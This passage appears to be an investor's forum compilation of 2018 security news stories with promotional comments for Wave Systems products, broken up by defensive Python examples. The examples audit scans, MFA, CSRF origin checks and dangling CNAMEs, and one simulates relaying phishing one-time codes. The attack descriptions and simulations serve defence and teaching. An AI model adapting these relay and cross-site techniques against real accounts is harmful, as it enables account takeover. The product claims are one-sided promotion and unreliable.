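    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            hosts.append(m.group(1))
    return hosts


def parse_ports(text: str):
    """Yield (host, port, state, service) for each port entry in nmap -oG output.

    Port entries have the form port/state/protocol/owner/service/rpcinfo/version/.
    """
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        for entry in fields.get("Ports", "").split(","):
            parts = entry.strip().split("/")
            if len(parts) < 5 or not parts[0].isdigit():
                continue
            yield m.group(1), int(parts[0]), parts[1], parts[4]


def exposed_services(text: str) -> list:
    """(host, port, service) for every open port in EXPOSED_SERVICES; filtered ports are not exposed."""
    return [(host, port, EXPOSED_SERVICES[port])
            for host, port, state, _ in parse_ports(text)
            if state == "open" and port in EXPOSED_SERVICES]


def unknown_hosts(text: str, inventory) -> list:
    """Scanned hosts the asset inventory does not know about."""
    return sorted(set(scanned_hosts(text)) - set(inventory))


if __name__ == "__main__":
    inventory = ["203.0.113.10", "203.0.113.12"]  # constructed asset list
    for finding in exposed_services(SAMPLE_SCAN):
        print("EXPOSED", *finding)
    for host in unknown_hosts(SAMPLE_SCAN, inventory):
        print("NOT IN INVENTORY", host)
```

Run it against a real scan by feeding the output of `nmap -oG - ...` on your own public ranges; a host that is both unknown to the inventory and exposing SMB or Telnet is exactly the kind of system the two reports say attackers go looking for.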
================================================================
The Wave Alternative could help prevent the potential problems arising in the above article without having to take the device off of the Internet. See excerpts below.
================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
https://www.wavesys.com/wave-alternative
Excerpts:
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Cyber Readiness Institute wants to help small firms fix their authentication
https://www.cyberscoop.com/cyber-readiness-institute-supply-chain-cybersecurity-guide/
Help is on the way for leaders at small and medium-sized businesses that have had to contend with cyberthreats that would be a challenge even for massive firms with multimillion-dollar security budgets.
A program led by alumni of President Barack Obama’s cybersecurity commission was unveiled Monday, offering free tools and resources meant to help smaller companies better secure their corporate networks. The Cyber Readiness Institute was launched in July 2017 by the Center for Global Enterprise, an institution devoted to researching management practices, to help small and medium-sized enterprises mitigate cyber risk. The Cyber Readiness Program, which launched Monday, includes support from private sector heavyweights like Mastercard, Microsoft, ExxonMobil and General Motors.
The plan is for Fortune 500 companies to pass down cybersecurity know-how to companies with only a fraction of the resources, a method that ultimately aims to stop hackers before they can use one company as a foothold to its partners.
“Small businesses very often are the source of data breaches into large companies because of the supply chain effect,” Mastercard CEO Ajay Banga said at a press conference in Washington on Monday. “What’s coming at them is a cyberthreat that doesn’t distinguish between large and small. … This is not a problem for small businesses. It’s a problem for all of us, collectively.”
The nonprofit initiative led by Kiersten Todt, who was executive director of Obama’s cybersecurity commission, has been in the works for more than a year. The guidance released Monday gives tips for businesses on how to improve authentication, best password practices and integrate effective patching techniques, three areas where the Obama commission determined smaller companies struggle.
“Almost all the breaches in the U.S. from the past 10 years are sourced from authentication issues,” she said, adding later that CRI also encourages firms to implement security into their office culture.
“It starts with identifying a person who will be responsible for this in your company,” said Todt, who is the institute’s managing director. “[We] provide policy templates for your organization and … are creating communication and posters you need to internalize this.”
The CRI tools are based on pilot programs with 19 companies ranging in size from just a handful of employees to roughly 800, said former IBM CEO Sam Palmisano, a CRI co-chair. The program is intended to be only the first round of guidance, with additions to come as more enterprises get involved and provide feedback, he said.
Next steps include possible collaboration with the Department of Homeland Security and Grant Schneider, the federal chief information security officer, to help raise awareness about supply chain security.
But this project is only the beginning of a longer process. A number of well-publicized hacks, including the breach this year at Saks Fifth Avenue and the 2013 Target hack, occurred because thieves exploited outside software. Yet only 16 percent of companies surveyed as part of a Ponemon Institute study published in November say they are prepared to stop such incidents.
“I just want you all to understand this is going to be really hard,” Banga said. “Think of this as a three or four year effort to change the dialogue between small businesses and the rest of the industry to get things to improve.”
=================================================================
It doesn't have to be that hard. A solution is already here (see link below). Helping these smaller companies with their authentication (Wave VSC 2.0) could benefit all companies as many smaller companies and bigger companies' technology are intertwined. Using better security at less than half the cost could help turn this three to four year effort into much less. imo. Someone like BS would need to lead ESW/Wave in marketing Wave VSC 2.0 to these small, medium and large companies. imo.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
U.S. Ballistic Missile Defense Systems Fail Cybersecurity Audit
https://www.bleepingcomputer.com/news/security/us-ballistic-missile-defense-systems-fail-cybersecurity-audit/
A U.S. Department of Defense Inspector General report released this week outlines the inadequate cybersecurity practices being used to protect the United States' ballistic missile defense systems (BMDS).
Ballistic missile defense systems are used by the U.S.A. to counter short-, medium-, intermediate- and long-range ballistic missiles that target the United States of America. As these systems are controlled by computers and software, they are at risk of being targeted by state-sponsored attacks that attempt to gain control of the systems, damage them, or steal classified information and source code.
On March 14, 2014, the DoD Chief Information Officer stated that the DoD must implement National Institute of Standards and Technology (NIST) security controls to protect their systems, which includes BMDS.
In a heavily redacted report by the DoD, it has been shown that BMDS facilities have failed to utilize required security controls such as multifactor authentication, vulnerability assessment and mitigation, server rack security, protection of classified data stored on removable media, encrypting transmitted technical information, physical facility security such as cameras and sensors, and did not perform routine assessments to make sure that these safeguards were in place.
In one facility, users were allowed to use single-factor authentication (only username + password) for up to 14 days during account creation. The report showed that in many cases, users would continue to use just a username and password for well past 14 days. At another facility, the domain administrator never bothered to configure policies that prevent users from logging in if they are not using multifactor authentication. Finally, one facility was using a system that does not even support multifactor authentication.
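The first two findings above are a grace period that nobody enforced. As an added example, not taken from the Inspector General report, the script below takes an export of directory accounts (constructed sample data; in Active Directory the corresponding attributes are whenCreated, SmartcardLogonRequired and Enabled, exportable with Get-ADUser) and lists every enabled account that is past the 14-day grace period and still not required to use a second factor, together with how many days overdue it is.

```python
"""Audit enabled accounts that have outlived a single-factor grace period."""
import csv
from datetime import date
from io import StringIO

GRACE_DAYS = 14  # the grace period the report describes

# Constructed sample export; the column names are this example's own.
SAMPLE_EXPORT = """\
account,created,mfa_required,enabled,last_logon
alice,2018-01-03,true,true,2018-03-10
bob,2018-02-01,false,true,2018-03-09
carol,2018-03-05,false,true,2018-03-10
dave,2017-11-20,false,false,2018-01-15
"""


def _flag(value: str) -> bool:
    return value.strip().lower() in ("true", "1", "yes")


def overdue_accounts(export_text: str, as_of: date, grace_days: int = GRACE_DAYS) -> list:
    """Return [(account, days_past_grace)] for enabled accounts still on password-only logon.

    Disabled accounts are skipped because they cannot log on at all; accounts already
    required to use a second factor are compliant regardless of age.
    """
    overdue = []
    for row in csv.DictReader(StringIO(export_text)):
        if not _flag(row["enabled"]) or _flag(row["mfa_required"]):
            continue
        age_days = (as_of - date.fromisoformat(row["created"])).days
        if age_days > grace_days:
            overdue.append((row["account"], age_days - grace_days))
    return overdue


if __name__ == "__main__":
    for account, days in overdue_accounts(SAMPLE_EXPORT, date(2018, 3, 12)):
        print(f"{account}: {days} days past the {GRACE_DAYS}-day grace period")
```

With the sample data as of 2018-03-12, only `bob` is reported (39 days old, 25 days past grace); `carol` is still inside the window and `dave` is disabled. Running such a report on a schedule, and acting on it (in Active Directory, `Set-ADUser <account> -SmartcardLogonRequired $true` turns the requirement on), is what turns the 14-day policy from a statement into a control.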
Vulnerabilities were also not properly patched and secured at numerous facilities. For example, a March 2018 vulnerability scan at one facility showed that vulnerabilities found in a January 2018 scan had never been fixed. Other facilities contained vulnerabilities that were discovered in 2013 and had still not been patched when an April 2018 vulnerability assessment was conducted.
The report also states that facilities were not encrypting data stored on removable devices or using systems that kept track of what data was being copied. Some facilities stated that they did not even know they needed to encrypt data on removable devices.
"In addition, officials did not encrypt data stored on removable media. The system owner for the [redacted] and the Information System Security Officer for [redacted] stated that their components did not encrypt data stored on removable media because the [redacted] did not require the use of encryption," stated the DoD report. "Although the [redacted] did not require data stored on removable media to be encrypted, system owners and Information System Security Officers have a responsibility to implement and enforce Federal and DoD cybersecurity policies and procedures for encrypting data stored on removable media. In May 2018, the [redacted] directed [redacted] to begin encrypting data stored on removable media using Federal Information Processing Standard 140-2 certified methods by October 9, 2018, as a condition to operate on the [redacted]."
In addition to computer and data security issues, there were physical security issues as well. There were instances of server racks not being locked, for four years a door was reporting that it was closed when in fact it was open, people gained unauthorized access simply by pulling open doors, and security cameras were not always installed at required locations.
The recommendations by the DoD Inspector General's office are what you would expect: fix these problems and follow the applicable federal requirements. Unfortunately, Chief Information Officers from various facilities did not respond to the draft report, and the Inspector General's office has now asked the Director, Commanding General, Commander, and Chief Information Officers to comment on the final report by January 8, 2019.
==================================================================
If Wave VSC 2.0 has already proven itself with the 'significant security requirements' of government (see article below), shouldn't it be used for many other areas of government?!?! BS, SKS, GK, and MW and others could bring the protection of Wave VSC 2.0 to the government as it could be very beneficial to them. This article just shows glaringly what is at stake without a product like Wave VSC 2.0. imo. Wave VSC 2.0 - Better security at less than half the cost.
==================================================================
Wave Systems Announces First U.S. Federal Government Customer for Wave Virtual Smart Card 2.0
https://www.wavesys.com/buzz/pr/wave-systems-announces-first-us-federal-government-customer-wave-virtual-smart-card-2.0
Lee, MA -
October 2, 2014 -
Wave Systems Corp. (NASDAQ: WAVX) marked an important sales milestone by announcing the first U.S. federal government customer for its Virtual Smart Card 2.0.
Since the Virtual Smart Card 2.0 became commercially available in late July 2014, Wave has entered into dozens of pilot deployments in multiple sectors, including healthcare, financial services, automotive, energy and utilities. However, today’s announcement marks the product’s first sale in the government sector.
“This is an important milestone for Wave,” said Bill Solms, CEO of Wave. “Wave Virtual Smart Card 2.0 has been purchased by a government agency with significant security requirements and one that requires redundant means of system authentication due to national security interests. This initial sale is modest compared to the addressable market within the Federal Government sector, but it is important to our strategy for marketing the Virtual Smart Card to address critical government infrastructure defense.”
“We believe that this sale, which was completed on a shorter sales cycle than we had anticipated, supports our view that customers are interested in the type of cyber security solution that Wave’s Virtual Smart Card 2.0 provides,” Solms added.
Wave Virtual Smart Card 2.0 is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7. It also supports Windows 8 and 8.1. Wave’s new solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, lower total cost of ownership, and a reduced risk of unauthorized use.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure PIN and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with TPM 1.2 or TPM 2.0
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Android Malware Steals from PayPal Accounts
https://www.infosecurity-magazine.com/news/android-malware-steals-from-paypal?utm_source=twitterfeed&utm_medium=twitter
What happens when you combine a remotely controlled banking Trojan with an abuse of Android Accessibility services? According to new research from ESET, you get an Android Trojan that steals money from PayPal accounts, even with 2FA on.
The malware reportedly disguises itself as a battery optimization tool, and threat actors distribute it via third-party apps. “After being launched, the malicious app terminates without offering any functionality and hides its icon. From then on, its functionality can be broken down into two main parts,” researchers wrote.
In a video recording, the researchers demonstrated the malware attempting to steal money from a PayPal account after the user had logged into the app: it tried to send €1,000, which failed only because the account had insufficient funds and the app asked the user to link a new card.
The malware also attempted to steal login credentials and used phishing screens in overlay attacks on Google Play, WhatsApp, Skype, Viber and Gmail. “The malware’s code contains strings claiming the victim’s phone has been locked for displaying child pornography and can be unlocked by sending an email to a specified address. Such claims are reminiscent of early mobile ransomware attacks, where the victims were scared into believing their devices were locked due to reputed police sanctions,” researchers wrote.
According to Will LaSala, director of security solutions, security evangelist, OneSpan, the attack against the PayPal app highlights the vulnerabilities of installing apps from unknown sources and demonstrates how easily an overlay attack can hijack a strong application.
“What is concerning is that this malware app can download other applications, so even though today’s attack is against PayPal, this attack could easily be repurposed to attack any other application on the user's mobile device. What’s new for this malware is that it is not focused on phishing for the user's credentials, although it appears to attempt to phish for the user’s credit card information; instead it attempts to directly attack the transaction by creating an instant money transfer to the attacker’s account.”
=================================================================
Wave was at one point testing authentication under NSTIC with PayPal using Android devices. Why not use Wave Knowd with Android devices (Samsung) to have a better 2FA than what was done in the article?!?! PayPal could have better security for its customers and Samsung could have better security for its customers (see previous Samsung post)!! Wave must have already done extensive testing with PayPal and Samsung. imo.
=================================================================
Wave Knowd Introduces New Model for Internet Authentication Without Passwords
https://www.wavesys.com/buzz/pr/wave-knowd-introduces-new-model-internet-authentication-without-passwords
Knowd ‘Trust Score’ Assures User Identity when Accessing Web Services
Lenovo tells Asia-Pacific staff: Work lappy with your unencrypted data on it has been nicked
https://www.theregister.co.uk/2018/12/11/lenovo_asia_pacific_staff_data_unencrypted_work_laptop_stolen/
That's thousands of employees' names, monthly salaries, bank details
Exclusive: A corporate-issued laptop lifted from a Lenovo employee in Singapore contained a cornucopia of unencrypted payroll data on staff based in the Asia Pacific region, The Register can exclusively reveal.
Details of the massive screw-up reached us from Lenovo staffers, who are simply bewildered at the monumental mistake. Lenovo has sent letters of shame to its employees confessing the security snafu.
"We are writing to notify you that Lenovo has learned that one of our Singapore employees recently had the work laptop stolen on 10 September 2018," the letter from Lenovo HR and IT Security, dated 21 November, stated.
"Unfortunately, this laptop contained payroll information, including employee name, monthly salary amounts and bank account numbers for Asia Pacific employees and was not encrypted."
Lenovo employs more than 54,000 staff worldwide (PDF), the bulk of whom are in China.
The letter stated there is currently "no indication" that the sensitive employee data has been "used or compromised", and Lenovo said it is working with local police to "recover the stolen device".
In a nod to concerns that will have arisen from this lapse in security, Lenovo is "reviewing the work practices and control in this location to ensure similar incidents do not occur".
On hand with more wonderfully practical advice, after the stable doors were left swinging open, Lenovo told staff: "As a precaution, we recommend that all employees monitor bank accounts for any unusual activities. Be especially vigilant for possible phishing attacks and be sure to notify your financial institution right away if you notice any unusual transactions."
The letter concluded on a high note. "Lenovo takes the security of employee information very seriously. And while there is no indication any data has been compromised, please let us know if you have any questions."
The staff likely do. One told us the incident was "extremely concerning" but "somehow not surprising in any way. How on Earth did they let this data exist on a laptop that was not encrypted?"
The Register has asked Lenovo to comment. ®
==================================================================
If Lenovo had this lapse, it seems like there could be large numbers of other companies that find themselves in potentially the same situation. Time for companies to get the SED management product from Wave below and keep this from ever happening. imo.
==================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Nice phone account you have there – shame if something were to happen to it: Samsung fixes ID-theft flaws
https://www.theregister.co.uk/2018/12/10/samsung_patches_accountstealing_hole/
If Artem Moskowsky owes you money, it's a good time to ask
A recently patched set of flaws in Samsung's mobile site was leaving users open to account theft.
Bug-hunter Artem Moskowsky said the flaws he discovered, a since-patched trio of cross-site request forgery (CSRF) bugs, would have potentially allowed attackers to reset user passwords and take over accounts.
Moskowsky told The Register that the vulnerabilities were due to the way the Samsung.com account page handled security questions. When the user forgets their password, they can answer the security question to reset it.
Normally, the Samsung.com web application would check the "referer" header to make sure data requests only come from sites that are supposed to have access.
In this case, however, those checks are not properly run and any site can get that information. This would let the attacker snoop on user profiles, change information (such as user name), or even disable two-factor authentication and steal accounts by changing passwords.
"Due to the vulnerabilities it was possible to hack any account on account.samsung.com if the user goes to my page," Moskowsky explained.
"The hacker could get access to all the Samsung user services, private user information, to the cloud."
In one proof of concept, the researcher showed how an attack site could use the CSRF flaw to change the target's Samsung.com security question to one of the attacker's choosing. Armed with the new security question and its answer, the attacker would then use the "reset password" function to steal the target's Samsung account.
It turned out the situation was even worse than the researcher initially thought. Thinking there were only two CSRF vulnerabilities on the site, Moskowsky went to report the issue directly to Samsung, something that was also done through the Samsung.com website. While reporting the issue, he noticed a third bug, the one that would allow him to forcibly change security questions and answers.
"I first discovered two vulnerabilities. But then when I logged in to security.samsungmobile.com to check my report, I was redirected to the personal information editing page," Moskowsky explained.
"This page didn't look like a similar page on account.samsung.com. There was an additional 'secret question' field on it."
In total, three bugs were found and were rated medium, high, and critical, respectively. Moskowsky earned himself a payout of $13,300 for the find, a nice payout, but well short of the $20,000 he pocketed for spotting a major bug in Steam back in October.
Samsung did not respond to a request for comment on the matter. ®
=================================================================
If Samsung were using Wave software with a mobile TPM in its phones or with a TPM in its computers, flaws like the ones that crop up in the article could be severely diminished in their impact. imo.
The TPM or mobile TPM (with the TEE) could be used as a second factor of authentication with Wave's software and used by a preferred (or more secure) customer on Samsung's sites.
=================================================================
Wave Systems Signs 15-year License Agreement with Samsung
https://www.wavesys.com/buzz/news/wave-systems-signs-15-year-license-agreement-samsung
Security Week, Wednesday, May 30, 2012
Wave Systems has signed a 15-year software license and distribution agreement with Samsung, enabling Samsung to bundle Wave’s EMBASSY Security Center (ESC) and TCG Software Stack (TSS) technology with devices that include a Trusted Platform Module (TPM), an industry standard security chip embedded in the motherboard of a computer or other electronic device.
In an SEC filing, Wave said it would receive a per-unit royalty based on Samsung’s sales of products that include its technology, but did not provide estimates in terms of expected revenue derived as a result.
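The Samsung.com CSRF flaws in The Register piece above came down to a referer check that was not enforced on a state-changing endpoint. The following is an added example in Python, not code from the article, Samsung or Wave: a handler for a "change security question" request that fails closed when the Origin/Referer header is missing or from another site, shown beside the substring-style check that looks similar but accepts lookalike hosts. The trusted-origin allowlist, the session and store shapes, and the handler name are assumptions.

```python
from urllib.parse import urlsplit

# Constructed allowlist of page origins permitted to submit state-changing
# requests; the site's real configuration is not on the page (assumption).
TRUSTED_ORIGINS = {"https://account.samsung.com"}

DEFAULT_PORTS = {"http": 80, "https": 443}


def request_origin(headers):
    """Return the requesting page's origin (scheme://host[:port]) or None.

    Browsers send Origin on cross-site POSTs; Referer is the fallback the
    article describes. Anything unparsable yields None so callers fail closed.
    """
    value = headers.get("Origin") or headers.get("Referer")
    if not value or value == "null":
        return None
    try:
        parts = urlsplit(value)
        host, port = parts.hostname, parts.port
    except ValueError:  # malformed port such as "https://x:abc"
        return None
    if parts.scheme not in DEFAULT_PORTS or not host:
        return None
    if port is None or port == DEFAULT_PORTS[parts.scheme]:
        return f"{parts.scheme}://{host}"
    return f"{parts.scheme}://{host}:{port}"


def naive_referer_check(headers):
    """Substring match: looks like a check but accepts lookalike hosts
    such as account.samsung.com.<other-domain>."""
    return "account.samsung.com" in headers.get("Referer", "")


def strict_origin_check(headers):
    """Exact origin comparison against the allowlist; missing header -> reject."""
    origin = request_origin(headers)
    return origin is not None and origin in TRUSTED_ORIGINS


def change_security_question(headers, session, form, store):
    """Hypothetical handler for the 'edit security question' endpoint.

    `store` maps usernames to their security question. The session cookie
    proves who the browser is logged in as, but not which page built the
    request; that gap is exactly what a cross-site request exploits.
    """
    user = session.get("user")
    if not user:
        return 401, "not logged in"
    if not strict_origin_check(headers):
        return 403, "cross-site request rejected"
    store[user] = {"question": form["question"], "answer": form["answer"]}
    return 200, "security question updated"


if __name__ == "__main__":
    session = {"user": "victim"}
    store = {"victim": {"question": "first pet?", "answer": "rex"}}
    # Constructed cross-site submission: the cookie rides along, the Origin does not match.
    attack_headers = {"Origin": "https://attacker.example"}
    print(change_security_question(attack_headers, session,
                                   {"question": "color?", "answer": "blue"}, store))
    print(store["victim"])  # unchanged
```

An origin check of this kind complements, rather than replaces, a per-request anti-CSRF token on the form itself.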
Hackers bypassed Gmail & Yahoo’s 2FA to target US officials
https://www.hackread.com/hackers-bypassed-gmail-yahoos-2fa-to-target-us-officials/
The attack was carried out by the Iran-backed Charming Kitten hackers, and victims include dozens of US government officials.
Private emails of US sanctions officials and nuclear scientists have been breached by Iranian state-sponsored hackers. According to data obtained by Certfa, a cybersecurity firm based in London, the hacking group Charming Kitten is responsible for the break-in, which took place in November 2018, perhaps in response to the re-imposition of strict economic sanctions on Iran by US President Donald Trump.
Reportedly, Charming Kitten is involved in a targeted security breach against top US officials, and obtained emails of over a dozen US Treasury officials, people involved in the nuclear deal signed between Tehran and Washington, DC think tank employees, Arab atomic scientists, and prominent figures from Iranian civil society.
Interestingly, the hackers made the mistake of leaving one of their servers open to the internet, which is how Certfa identified their hit list. According to Certfa’s report, the phishing campaign is a large-scale one, involving the email accounts of eminent US government officials, journalists, activists and others.
The campaign is particularly noteworthy for a novel technique that let the hackers bypass the two-factor authentication (2FA) protections that Gmail, Yahoo Mail and similar services offer. The incident therefore highlights the risk of relying on the one-time passwords or one-tap logins that 2FA uses, especially when the one-time code is delivered by SMS to the mobile phone.
To launch the attack, the hackers gathered detailed information about their targets and wrote spear-phishing emails tailored to each target's level of operational security. Every email carried a hidden image whose purpose was to alert the hackers when the target viewed the email.
As soon as the target entered a password into the fake Yahoo or Gmail login page, the hackers received the credentials in real time and entered them on the target’s real login page. If the account was protected by 2FA, the hackers redirected the target to another page that asked for the one-time password.
Certfa researchers found a list of 77 Yahoo and Gmail addresses on the exposed server. This is merely a fraction of Charming Kitten's total targets, and it remains unclear whether the group successfully breached the email accounts of all of them.
One of Charming Kitten's targets was American Enterprise Institute scholar Frederick Kagan, who told the Associated Press in response to the attack that:
The attack also reinforces the fact that cyberespionage is very deeply embedded into the US-Iran relationship.
=================================================================
After reading this article, there should be a line waiting to beat down the Wave/ESW door for Wave VSC 2.0! imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases:
  ◦ Virtual Private Network (VPN)
  ◦ Local logon
  ◦ Remote logon
  ◦ Remote desktop access
  ◦ Intranet/Extranet
  ◦ Cloud applications
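The real-time relay described in the Charming Kitten article above works because a one-time code is valid no matter which page the victim typed it into. The following added example (Python; not code from the article, Certfa or Wave) models that: a standard RFC 6238 TOTP check accepts a relayed code, while a simplified stand-in for an origin-bound second factor, where the authenticator signs the origin the browser is actually on together with a server challenge (the property FIDO/WebAuthn authenticators provide), rejects the same relay even when the attacker claims the real origin. Service names, keys, origins and the HMAC-in-place-of-signature simplification are constructed assumptions.

```python
import hashlib
import hmac
import secrets
import struct

# --- One-time passwords (RFC 6238 TOTP over HMAC-SHA1) ----------------------

def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """Standard TOTP: HMAC of the 30-second counter, dynamically truncated."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"


class OtpService:
    """Login server whose second factor is a TOTP code (constructed)."""

    def __init__(self, shared_secret: bytes):
        self.shared_secret = shared_secret

    def second_factor_ok(self, code: str, unix_time: int) -> bool:
        return hmac.compare_digest(code, totp(self.shared_secret, unix_time))


def relay_otp(shared_secret: bytes, unix_time: int) -> bool:
    """Model of the relay in the article: the victim types the code into the
    phishing page and it is forwarded unchanged to the real service inside
    the validity window. The service has no way to tell where it was typed."""
    service = OtpService(shared_secret)
    code_typed_on_phishing_page = totp(shared_secret, unix_time)
    return service.second_factor_ok(code_typed_on_phishing_page, unix_time)


# --- Origin-bound second factor (simplified model, constructed) --------------

REAL_ORIGIN = "https://mail.example.com"                      # constructed
PHISHING_ORIGIN = "https://mail-example-secure.example.net"   # constructed


def authenticator_sign(key: bytes, challenge: bytes, browser_origin: str) -> bytes:
    """The authenticator signs the server challenge together with the origin
    the browser reports, i.e. the page the user is really on. HMAC stands in
    for the public-key signature a FIDO authenticator would produce."""
    return hmac.new(key, challenge + browser_origin.encode(), hashlib.sha256).digest()


class OriginBoundService:
    def __init__(self, key: bytes, origin: str = REAL_ORIGIN):
        self.key, self.origin = key, origin
        self.outstanding = set()  # challenges issued and not yet consumed

    def new_challenge(self) -> bytes:
        challenge = secrets.token_bytes(16)
        self.outstanding.add(challenge)
        return challenge

    def second_factor_ok(self, challenge: bytes, claimed_origin: str, signature: bytes) -> bool:
        if challenge not in self.outstanding or claimed_origin != self.origin:
            return False
        self.outstanding.discard(challenge)  # single use
        expected = hmac.new(self.key, challenge + claimed_origin.encode(), hashlib.sha256).digest()
        return hmac.compare_digest(expected, signature)


def relay_origin_bound(key: bytes, spoof_origin: bool) -> bool:
    """Same relay against the origin-bound factor: a real challenge is fetched
    and passed to the victim's browser on the phishing origin, and the
    resulting signature is forwarded, optionally with the real origin claimed.
    Either way the signature covers PHISHING_ORIGIN, so verification fails."""
    service = OriginBoundService(key)
    challenge = service.new_challenge()
    signature = authenticator_sign(key, challenge, PHISHING_ORIGIN)
    claimed = REAL_ORIGIN if spoof_origin else PHISHING_ORIGIN
    return service.second_factor_ok(challenge, claimed, signature)


def legitimate_origin_bound(key: bytes) -> bool:
    """Control case: the browser really is on REAL_ORIGIN."""
    service = OriginBoundService(key)
    challenge = service.new_challenge()
    return service.second_factor_ok(challenge, REAL_ORIGIN,
                                    authenticator_sign(key, challenge, REAL_ORIGIN))


if __name__ == "__main__":
    secret = b"constructed-demo-secret"
    print("OTP relay accepted:", relay_otp(secret, 1_543_000_000))                  # True
    print("origin-bound relay accepted:", relay_origin_bound(secret, False))         # False
    print("origin-bound relay, origin spoofed:", relay_origin_bound(secret, True))   # False
    print("legitimate origin-bound login:", legitimate_origin_bound(secret))         # True
```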
A critical bug in Microsoft left 400M accounts exposed
https://www.hackread.com/critical-bug-in-microsoft-left-400m-accounts-exposed/
A bug bounty hunter from India, Sahad Nk, who works for SafetyDetective, a cybersecurity firm, has received a reward from Microsoft for uncovering and reporting a series of critical vulnerabilities in Microsoft accounts.
These vulnerabilities affected users’ Microsoft accounts, from MS Office files to Outlook emails. This means all kinds of accounts (over 400 million) and all sorts of data were susceptible to hacking. The bugs, chained together, would become the perfect attack vector for gaining access to a user’s Microsoft account. All the attacker needed was to get the user to click on a link.
According to Sahad Nk’s blog post, a Microsoft subdomain, “success.office.com,” wasn’t configured properly, which is why he was able to take control of it using a CNAME record, the DNS record that aliases one domain name to another. Using the CNAME record, Sahad was able to locate the misconfigured subdomain and point it to his personal Azure instance, gaining control of the subdomain and all the data it received.
On its own, that isn’t a big issue for Microsoft; the real problem lies in the fact that the Microsoft Office, Sway and Store apps could be tricked into transferring their authenticated login tokens to the now attacker-controlled domain when a user logs in via Microsoft’s Live. The reason is that the vulnerable apps used a wildcard regex, which allowed all subdomains to be trusted, explained Aviva Zacks of SafetyDetective.
As soon as the victim clicks on a specially designed link, received via email, he or she logs in through Microsoft Live’s login system. When the victim enters the username, password and 2FA code (if enabled), an account access token is generated that keeps the user logged in without needing to re-enter the credentials.
Anyone who gets hold of this access token effectively holds the user's credentials. Hence, an attacker can easily break into the account without alerting the account's owner or even alarming Microsoft about the unauthorized access.
The malicious link is crafted so that it forces the Microsoft login system to send the account token to the controlled subdomain. In this case the subdomain was controlled by Sahad; had a malicious attacker controlled it, a massive number of Microsoft accounts could have been put at risk. Most importantly, the malicious link appears authentic because the user is still signing in through the legitimate Microsoft login system.
The bug was reported by Nk (who works for SafetyDetective) to Microsoft and the good news is that it has been fixed; however, the exact bounty amount received by Nk is still unknown.
=================================================================
Prior to this bug being reported and for any other bug like it, Wave VSC 2.0 should be the better security the market is looking for since with it there doesn't need to be a 2FA code here, and the TPM present prevents a hacker from getting into the account. imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
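Two separate weaknesses were chained in the Microsoft case above: a subdomain whose CNAME pointed at an abandoned host, and token-issuing apps that trusted any subdomain via a wildcard. This added example (Python; not code from Microsoft, SafetyDetective or Wave) runs a dangling-CNAME audit over a constructed record set and puts a wildcard redirect check next to the exact-match allowlist that the OAuth 2.0 security best-current-practice recommends; the regex, hostnames, allowlist and resolver callback are assumptions, not the real configuration.

```python
import re
from urllib.parse import urlsplit

# --- 1. Dangling CNAME audit -------------------------------------------------

def find_dangling_cnames(cname_records, target_exists):
    """Return subdomains whose CNAME points at a target nobody provisions.

    cname_records: {subdomain: cname_target}. target_exists(name) -> bool is a
    resolver callback (in production: a DNS lookup plus a check that the
    target is still claimed by your own cloud account). An unclaimed target is
    what lets an outsider register it and receive the subdomain's traffic.
    """
    return sorted(sub for sub, target in cname_records.items()
                  if not target_exists(target))


# --- 2. Redirect-URI validation for the token-issuing login flow -----------

# Wildcard check of the kind the article describes (constructed; Microsoft's
# actual pattern is not on the page). Any host under example.com passes,
# including a subdomain an outsider has taken over.
WILDCARD_REDIRECT = re.compile(r"^https://([a-z0-9-]+\.)*example\.com(/.*)?$", re.IGNORECASE)


def redirect_allowed_wildcard(redirect_uri):
    return WILDCARD_REDIRECT.match(redirect_uri) is not None


# Exact-match allowlist: each app registers the full redirect URIs it uses.
REGISTERED_REDIRECTS = {
    "https://www.example.com/auth/callback",
    "https://store.example.com/signin-oidc",
}


def redirect_allowed_strict(redirect_uri):
    """Accept only an exact, pre-registered https URI: no wildcards, no
    fragment, default port normalised, path compared as-is."""
    try:
        parts = urlsplit(redirect_uri)
        port = parts.port
    except ValueError:  # unparsable port
        return False
    if parts.scheme != "https" or not parts.hostname or parts.fragment:
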